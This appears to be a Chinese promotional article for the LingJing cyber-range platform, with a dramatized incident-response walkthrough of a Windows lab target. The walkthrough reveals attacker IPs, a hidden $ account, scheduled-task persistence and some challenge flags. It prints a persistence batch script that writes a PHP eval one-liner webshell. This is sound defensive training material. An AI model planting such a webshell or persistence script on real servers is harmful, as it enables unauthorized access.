文章总结： LingJing是一款基于QEMU的桌面级网络安全靶场平台，支持MacM芯片及一键部署。新增Windows应急响应靶机，复刻真实WebShell入侵场景，涵盖日志溯源IP、排查隐藏账户、分析权限维持及任务计划后门。平台提供全流量监控与可视化界面，旨在通过真实案例提升红蓝队实战与应急响应能力。 综合评分： 88 文章分类： 应急响应,渗透测试,安全工具,红队,漏洞分析

LingJing(灵境)桌面级靶场平台新增:真实入侵复刻，知攻善防实验室-Windows应急响应靶，通关挑战

原创

414a

Sec铁匠铺

2025年12月29日 09:00 云南

LingJing 是一款专为复杂网络环境渗透测试量身打造的桌面级本地网络安全靶场平台。支持在线下载和 免配置一键部署 靶机环境，平台内置路由、灵眼(全流量监控、态势感知)*管理、监控打靶流量，快速启动靶机，满足从入门学习到红蓝队攻防实战的训练需求。后续版本将更新内置 Attacker 机器，进一步完善渗透测试打靶训练的完整流程，显著提升用户的训练体验和效率。本平台基于 Go+Fyne 构建图形界面，底层采用 QEMU 虚拟化技术，支持跨架构靶机启动。并且 能在 Mac M 系列芯片设备上启动 AMD64 架构靶机*，确保在不同硬件环境下无缝开展测试与训练。

#

项目访问地址

https://github.com/414aaj/LingJing

网盘下载地址

夸克：

https://pan.quark.cn/s/e6f3a48329fb

百度：

https://pan.baidu.com/s/14mjUdqHhoSEfVqe2h9VqoQ?pwd=cz94

若需转载文章请联系作者添加白名单

(可修改文章，不显示转载来源)

新增:知攻善防实验室-Windows-Web-3

靶场介绍

靶机源自于微信公众号:知攻善防实验室，可关注获取更多网络安全资料

👇👇👇

👆👆👆

情景模拟：深夜省护值守的”第六感”事件

时间：2024年3月12日 凌晨2:17

地点：某省电子政务外网监控大厅

人物：值班安全员414a、应急响应负责人3had0w

【监控告警】

凌晨2点17分，省护监控大屏突然跳出一条异常告警：政务门户网站服务器（IP:192.168.242.x）出现高频POST请求。值班员414a揉了揉发酸的眼睛，盯着屏幕上一连串指向 cmd.php 的请求日志，心跳突然加速。

“这流量模式……不对劲。”414a喃喃自语，手指悬在紧急断网按钮上方颤抖了三秒，然后猛地按了下去。

【甲方质询】

“为什么要停设备？”电话那头，甲方负责人的声音带着被吵醒的怒意。

414a咽了口唾沫，声音发虚却坚定：”我第六感告诉我，这机器可能被黑了。刚才日志里出现大量 cmd.php 的POST请求，像是WebShell在接收指令。”

“第六感？”对方冷笑，”你最好真的能找出证据，否则……”

【应急响应启动】

早上7点，应急响应负责人3had0w带着团队赶到现场。414a已经按照预案将靶机隔离，并准备好了分析环境。

“说说你的发现。”3had0w一边启动VMware Workstation，一边问道。

“服务器是Windows Server 2022，跑着phpstudy搭建的Z-Blog博客系统。我暂停服务前抓了几个关键日志。”414a递上移动硬盘，”账户密码是 administrator/2025@LingJing ，已经在靶机里。”

【线索追踪】

第一步：日志溯源攻击IP

3had0w登录系统，直奔 D盘 。用Sublime Text打开后，搜索 .php 关键词，屏幕上瞬间被密密麻麻的日志填满。

“看这两个IP，”3had0w指着屏幕，”192.168.75.129和192.168.75.130，在凌晨1:30-2:15间持续对 cmd.php 发送POST请求，而且返回体都是200。这就是攻击源！”

414a赶紧记下： 攻击者IP1: 192.168.75.129 ， 攻击者IP2: 192.168.75.130 。

第二步：排查隐藏账户

“攻击者肯定不会只用WebShell，”3had0w打开”计算机管理”→”本地用户和组”，在用户列表里果然发现一个带$符号的异常账户—— xxxxxxxxx 。

“典型的隐藏用户，”3had0w解释，”Windows下以$结尾的用户名不会出现在 net user 命令结果里，但通过注册表或管理工具能看到。”他顺便检查了注册表 SAM\Domains\Account\Users\Names ，确认了该用户的SID。

414a补充： 隐藏用户名称: xxxxxxxxx 。

第三步：深挖权限维持

切换到 xxxxxxxxx 用户目录下，团队在 C盘路径下 发现了一个 system.bat 脚本。打开一看，内容触目惊心：

batch

@echo off

echo flag{xxxxxxxx}

echo ^<?php eval($_POST['pass']);?^> > D盘

“这就是第三个flag，”3had0w皱眉，”还在写一句话木马维持权限。”

第四步：任务计划里的秘密

3had0w打开”任务计划程序”，发现两个由 xxxxxxxxx 创建的任务。在任务描述的备注栏里，赫然写着： flag{zgsfsys@sec} 。

“两个任务都指向那个 system.bat ，”414a分析，”攻击者做了双重保险，确保重启后木马还能运行。”

第五步：网站后台的陷阱

“还差最后一个flag，”3had0w盯着题目要求，”题目说考点不在IP和用户，那应该在Web应用层。”

他启动phpstudy，访问`站点，发现是Z-Blog系统。尝试登录后台失败，3had0w灵机一动：”这是我们自己服务器，直接重置密码！”

下载Z-Blog官方密码重置工具 nologin.php 放到网站根目录，访问后顺利进入后台。在用户管理界面，一个名为 hack 的用户资料里藏着最后的线索：

flag{xxxxxxxx}

【复盘总结】

下午3点，3had0w向甲方提交报告：

事件结论：服务器遭WebShell入侵，攻击者通过Z-Blog漏洞上传 cmd.php 获取初始权限，创建隐藏用户 xxxxxxxxx 进行权限维持，并植入计划任务确保后门持久化。三个flag分别为权限维持标记、任务计划标记和后台留痕标记。

甲方负责人沉默片刻，对414a说：”……第六感有时候比规则更重要。”

414a长舒一口气，瘫在椅子上。监控大屏上，服务器已重装上线，日志干干净净。但这次”第六感”事件，成了他职业生涯中最难忘的一课。

通关条件验证：

1. ✅ 攻击者IP

2. ✅ 隐藏用户

3. ✅ 三个flag

关注公众号后，添加微信(备注加群)

👇更多详细内容关注👇

👆更多详细内容关注👆

合作项

• 可定制专栏靶机凭授权码发放获取定制靶机
• 平台广告位广告招商
• 欢迎来聊更多合作模式

#

本项目由个人独立开发维护。若您认可本项目的工作，可通过给

GitHub项目加星标或微信公众号文章打赏的方式支持本项目持续发展

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Sec铁匠铺 414a《LingJing(灵境)桌面级靶场平台新增:真实入侵复刻，知攻善防实验室-Windows应急响应靶，通关挑战》